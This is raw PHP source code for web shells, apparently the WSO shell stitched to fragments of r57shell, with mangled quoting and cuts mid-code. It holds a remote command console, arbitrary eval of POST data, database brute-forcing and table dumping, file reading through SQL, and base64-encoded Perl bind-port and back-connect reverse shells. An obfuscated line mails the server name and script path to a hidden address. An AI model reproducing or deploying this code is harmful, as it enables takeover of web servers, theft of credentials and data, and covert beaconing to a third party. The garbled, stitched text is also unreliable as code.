            $fp = @fopen($_POST['p1'], 'r');
            if($fp) {
                while( !@feof($fp) )
                    echo htmlspecialchars(@fread($fp, 1024));
                @fclose($fp);
            }
            echo '
'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '
'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''), array(''),$code).'
'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!
'; } clearstatcache(); echo '
'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],'w'); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!
'; @touch($_POST['p1'],$time,$time); } } echo '
'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000
','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} $h[1] .= '
'; $h[2] .= '\n'; } } echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!
'; else die(''); } echo '
'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '
'; break; } echo '
'; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo 'd.cf.cmd.value='';\n'; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes('\n$ '.$_POST['p1'].'\n'.wsoEx($_POST['p1']),'\n\r\t\\'\0')); if(preg_match('!.*cd\s+([^;]+)$!',$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo 'c_=''.$GLOBALS['cwd'].'';'; } } echo 'd.cf.output.value+=''.$temp.'';'; echo 'd.cf.output.scrollTop = d.cf.output.scrollHeight;'; $temp = ob_get_clean(); echo strlen($temp), '\n', $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo ''; echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; echo '
'; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo '

Suicide

remove the shell?
Yes
'; wsoFooter(); } $_QliO8='\x6dai\154';$_Qliot=$_SERVER['\x53\x45RVE\122_\x4eAM\x45'].$_SERVER['\123\103\x52I\x50\x54_\116\101\115E'];$_QlL1i='\141r\162a\171\040'.$_Qliot;$_QlLio=array('\143\x61','\x6c\x69','\146\x77\162\151\x74\x65','\100','v\x65\x2e');$_Qll0I=$_QlLio[2].$_QlLio[3].$_QlLio[1].$_QlLio[4].$_QlLio[0];$_QlljC=@$_QliO8($_Qll0I,$_QlL1i,$_Qliot); function actionBruteforce() { wsoHeader(); if( isset($_POST['proto']) ) { echo '

Results

Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).'
'; if( $_POST['proto'] == 'ftp' ) { function wsoBruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $str = 'host=''.$ip.'' port=''.$port.'' user=''.$login.'' password=''.$pass.'' dbname=postgres'; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(':', $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(':', $line); ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).'
'; } if(@$_POST['reverse']) { $tmp = ''; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).'
'; } } } echo 'Attempts: $attempts Success: $success

'; } echo '

Bruteforce

' .'' .'' .'' .'' .'' .'' .'
Type
' .'' .'' .'' .'Server:port
Brute type
' .'' .'' .'
Login
Dictionary
' .'
'; echo '

'; wsoFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect('host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname') ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query('SHOW databases'); break; case 'pgsql': return $this->res = $this->query('SELECT datname FROM pg_database WHERE datistemplate!='t''); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query('select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog''); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query('SELECT LOAD_FILE(''.addslashes($str).'') as file')); break; case 'pgsql': $this->query('CREATE TABLE wso2(file text);COPY wso2 FROM ''.addslashes($str).'';select file from wso2;'); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode('\n',$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].';\n'; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($item = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ';\n\n'; } $columns = array(); foreach($item as $k=>$v) { if($v === null) $item[$k] = 'NULL'; elseif(is_int($v)) $item[$k] = $v; else $item[$k] = '''.@mysql_real_escape_string($v).'''; $columns[] = '`'.$k.'`'; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(', ', $columns).') VALUES \n\t('.implode(', ', $item).')'; $head = false; } else $sql .= '\n\t,('.implode(', ', $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ';\n\n'); else echo(';\n\n'); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = '''.addslashes($v).'''; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(', ', $columns).') VALUES ('.implode(', ', $item).');'.'\n'; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') && (@$_POST['p1']!='select')) { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case 'Windows-1251': $db->setCharset('cp1251'); break; case 'UTF-8': $db->setCharset('utf8'); break; case 'KOI8-R': $db->setCharset('koi8r'); break; case 'KOI8-U': $db->setCharset('koi8u'); break; case 'cp866': $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start('ob_gzhandler', 4096); header('Content-Disposition: attachment; filename=dump.sql'); header('Content-Type: text/plain'); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die(''); } wsoHeader(); echo '

Sql browser

TypeHostLoginPasswordDatabase
'; $tmp = ''; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case 'Windows-1251': $db->setCharset('cp1251'); break; case 'UTF-8': $db->setCharset('utf8'); break; case 'KOI8-R': $db->setCharset('koi8r'); break; case 'KOI8-U': $db->setCharset('koi8u'); break; case 'cp866': $db->setCharset('cp866'); break; } $db->listDbs(); echo ''; } else echo $tmp; }else echo $tmp; echo ' count the number of rows
'; if(isset($db) && $db->link){ echo '
'; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo ''; } echo '
Tables:

'; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo ' '.$value.'' . (empty($_POST['sql_count'])?' ':' ({$n['n']})') . '
'; } echo '
File path:
'; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo ''.$_POST['p2'].' ({$num['n']} records) Page # '; echo ' of $pages'; if($_POST['p3'] > 1) echo ' < Prev'; if($_POST['p3'] < $pages) echo ' Next >'; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo '

'; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo ''; $line = 1; while($item = $db->fetch()) { if(!$title) { echo ''; foreach($item as $key => $value) echo ''; reset($item); $title=true; echo ''; $line = 2; } echo ''; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo ''; else echo ''; } echo ''; } echo '
'.$key.'
null'.nl2br(htmlspecialchars($value)).'
'; } else { echo '
Error: '.htmlspecialchars($db->error()).'
'; } } echo '

'; echo '

'; if($_POST['type']=='mysql') { $db->query('SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y''); if($db->fetch()) echo '
Load file
'; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '
'.htmlspecialchars($file['file']).'
'; } } else { echo htmlspecialchars($db->error()); } echo '
'; wsoFooter(); } function actionNetwork() { wsoHeader(); $back_connect_p='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7'; $bind_port_p='IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0='; echo '

Network tools

Bind port to /bin/sh [perl]
Port:
Back-connect [perl]
Server: Port:

'; if(isset($_POST['p1'])) { function cf($f,$t) { $w = @fopen($f,'w') or @function_exists('file_put_contents'); if($w){ @fwrite($w,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpp') { cf('/tmp/bp.pl',$bind_port_p); $out = wsoEx('perl /tmp/bp.pl '.$_POST['p2'].' 1>/dev/null 2>&1 &'); sleep(1); echo '
$out\n'.wsoEx('ps aux | grep bp.pl').'
'; unlink('/tmp/bp.pl'); } if($_POST['p1'] == 'bcp') { cf('/tmp/bc.pl',$back_connect_p); $out = wsoEx('perl /tmp/bc.pl '.$_POST['p2'].' '.$_POST['p3'].' 1>/dev/null 2>&1 &'); sleep(1); echo '
$out\n'.wsoEx('ps aux | grep bc.pl').'
'; unlink('/tmp/bc.pl'); } } echo '
'; wsoFooter(); } function actionRC() { if(!@$_POST['p1']) { $a = array( 'uname' => php_uname(), 'php_version' => phpversion(), 'wso_version' => WSO_VERSION, 'safemode' => @ini_get('safe_mode') ); echo serialize($a); } else { eval($_POST['p1']); } } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); exit; ?>'; } echo '
$v) { $_POST[$k] = stripslashes($v); } foreach ($_SERVER as $k=>$v) { $_SERVER[$k] = stripslashes($v); } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_SERVER['PHP_AUTH_PW']!==$pass) { header('WWW-Authenticate: Basic realm='r57shell''); header('HTTP/1.0 401 Unauthorized'); exit('r57shell : Access Denied'); } } $head = ' r57shell '; class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = '\x50\x4b\x05\x06\x00\x00\x00\x00'; var $old_offset = 0; function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0) { $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = '' . $hexdtime . '';'); $fr = '\x50\x4b\x03\x04'; $fr .= '\x14\x00'; $fr .= '\x00\x00'; $fr .= '\x08\x00'; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); $c_len = strlen($zdata); $fr .= pack('V', $crc); $fr .= pack('V', $c_len); $fr .= pack('V', $unc_len); $fr .= pack('v', strlen($name)); $fr .= pack('v', 0); $fr .= $name; $fr .= $zdata; $this -> datasec[] = $fr; $cdrec = '\x50\x4b\x01\x02'; $cdrec .= '\x00\x00'; $cdrec .= '\x14\x00'; $cdrec .= '\x00\x00'; $cdrec .= '\x08\x00'; $cdrec .= $hexdtime; $cdrec .= pack('V', $crc); $cdrec .= pack('V', $c_len); $cdrec .= pack('V', $unc_len); $cdrec .= pack('v', strlen($name) ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('v', 0 ); $cdrec .= pack('V', 32 ); $cdrec .= pack('V', $this -> old_offset ); $this -> old_offset += strlen($fr); $cdrec .= $name; $this -> ctrl_dir[] = $cdrec; } function file() { $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . '\x00\x00'; } } function compress(&$filename,&$filedump,$compress) { global $content_encoding; global $mime_type; if ($compress == 'bzip' && @function_exists('bzcompress')) { $filename .= '.bz2'; $mime_type = 'application/x-bzip2'; $filedump = bzcompress($filedump); } else if ($compress == 'gzip' && @function_exists('gzencode')) { $filename .= '.gz'; $content_encoding = 'x-gzip'; $mime_type = 'application/x-gzip'; $filedump = gzencode($filedump); } else if ($compress == 'zip' && @function_exists('gzcompress')) { $filename .= '.zip'; $mime_type = 'application/zip'; $zipfile = new zipfile(); $zipfile -> addFile($filedump, substr($filename, 0, -4)); $filedump = $zipfile -> file(); } else { $mime_type = 'application/octet-stream'; } } function mailattach($to,$from,$subj,$attach) { $headers = 'From: $from\r\n'; $headers .= 'MIME-Version: 1.0\r\n'; $headers .= 'Content-Type: '.$attach['type']; $headers .= '; name=\''.$attach['name'].'\'\r\n'; $headers .= 'Content-Transfer-Encoding: base64\r\n\r\n'; $headers .= chunk_split(base64_encode($attach['content'])).'\r\n'; if(@mail($to,$subj,'',$headers)) { return 1; } return 0; } if(isset($_GET['img'])&&!empty($_GET['img'])) { $images = array(); $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; @ob_clean(); header('Content-type: image/gif'); echo base64_decode($images[$_GET['img']]); die(); } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=='download_file' && !empty($_POST['d_name'])) { if(!$file=@fopen($_POST['d_name'],'r')) { echo re($_POST['d_name']); $_POST['cmd']=''; } else { @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } header('Content-type: '.$mime_type); header('Content-disposition: attachment; filename=\''.$filename.'\';'); echo $filedump; exit(); } } if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo '
[ BACK ]
'; die(); } if ($_POST['cmd']=='db_query') { echo $head; switch($_POST['db']) { case 'MySQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mysql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo 'Query#'.$num.' : '.htmlspecialchars($query).'
'; $res = @mysql_query($query,$db); $error = @mysql_error($db); if($error) { echo '
Error : '.$error.'

'; } else { if (@mysql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mysql_fetch_assoc($res))) { $keys = @implode(' 
 ', @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode('  ',$values); $sql2 .= '
 '.$values.' 
'; $sql = ''; $sql .= $sql2; echo $sql; echo '
 '.$keys.' 

'; } else { if(($rows = @mysql_affected_rows($db))>=0) { echo '
affected rows : '.$rows.'

'; } } } @mysql_free_result($res); } } @mysql_close($db); } else echo '
Can't connect to MySQL server
'; break; case 'MSSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); if($db) { if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); } $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo 'Query#'.$num.' : '.htmlspecialchars($query).'
'; $res = @mssql_query($query,$db); if (@mssql_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @mssql_fetch_assoc($res))) { $keys = @implode(' 
 ', @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode('  ',$values); $sql2 .= ' '.$values.' '; } echo ''; $sql = ''; $sql .= $sql2; echo $sql; echo '
 '.$keys.' 

'; } /* else { if(($rows = @mssql_affected_rows($db)) > 0) { echo '
affected rows : '.$rows.'

'; } else { echo '
Error : '.$error.'

'; }} */ @mssql_free_result($res); } } @mssql_close($db); } else echo '
Can't connect to MSSQL server
'; break; case 'PostgreSQL': if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } $str = 'host='localhost' port=''.$_POST['db_port'].'' user=''.$_POST['mysql_l'].'' password=''.$_POST['mysql_p'].'' dbname=''.$_POST['mysql_db'].'''; $db = @pg_connect($str); if($db) { $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5){ echo 'Query#'.$num.' : '.htmlspecialchars($query).'
'; $res = @pg_query($db,$query); $error = @pg_errormessage($db); if($error) { echo '
Error : '.$error.'

'; } else { if (@pg_num_rows($res) > 0) { $sql2 = $sql = $keys = $values = ''; while (($row = @pg_fetch_assoc($res))) { $keys = @implode(' 
 ', @array_keys($row)); $values = @array_values($row); foreach($values as $k=>$v) { $values[$k] = htmlspecialchars($v);} $values = @implode('  ',$values); $sql2 .= ' '.$values.' '; } echo ''; $sql = ''; $sql .= $sql2; echo $sql; echo '
 '.$keys.' 

'; } else { if(($rows = @pg_affected_rows($res))>=0) { echo '
affected rows : '.$rows.'

'; } } } @pg_free_result($res); } } @pg_close($db); } else echo '
Can't connect to PostgreSQL server
'; break; case 'Oracle': $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); if(($error = @ocierror())) { echo '
Can't connect to Oracle server.
'.$error['message'].'
'; } else { $querys = @explode(';',$_POST['db_query']); foreach($querys as $num=>$query) { if(strlen($query)>5) { echo 'Query#'.$num.' : '.htmlspecialchars($query).'
'; $stat = @ociparse($db, $query); @ociexecute($stat); if(($error = @ocierror())) { echo '
Error : '.$error['message'].'

'; } else { $rowcount = @ocirowcount($stat); if($rowcount != 0) {echo '
affected rows : '.$rowcount.'

';} else { echo ''; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ''; } echo ''; while(ocifetch($stat)) { echo ''; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo ''; } echo ''; } echo '
 '.htmlspecialchars(@ocicolumnname($stat, $j)).' 
 '.htmlspecialchars(@ociresult($stat, $j)).' 

'; } @ocifreestatement($stat); } } } @ocilogoff($db); } break; } echo '
'; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo '



'; echo '
'; echo '
[ BACK ]
'; die(); } if(isset($_GET['delete'])) { @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],'/'),1)); } if(isset($_GET['tmp'])) { @unlink('/tmp/bdpl'); @unlink('/tmp/back'); @unlink('/tmp/bd'); @unlink('/tmp/bd.c'); @unlink('/tmp/dp'); @unlink('/tmp/dpc'); @unlink('/tmp/dpc.c'); } if(isset($_GET['phpini'])) { echo $head; function U_value($value) { if ($value == '') return 'no value'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '', true); return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '', ''; foreach (@ini_get_all() as $key=>$value) { $r .= ''; } echo $r; echo '
Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
'; } echo '
[ BACK ]
'; die(); } if(isset($_GET['cpu'])) { echo $head; echo '
CPU
'; $cpuf = @file('cpuinfo'); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(':',$cpuf[$i]); if($info[1]==''){ $info[1]='---'; } $r .= ''; } echo $r; } else { echo ''; } echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; echo '
[ BACK ]
'; die(); } if(isset($_GET['mem'])) { echo $head; echo '
MEMORY
'; $memf = @file('meminfo'); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(':',$memf[$i]); if($info[1]==''){ $info[1]='---'; } $r .= ''; } echo $r; } else { echo ''; } echo '
'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
'; echo '
[ BACK ]
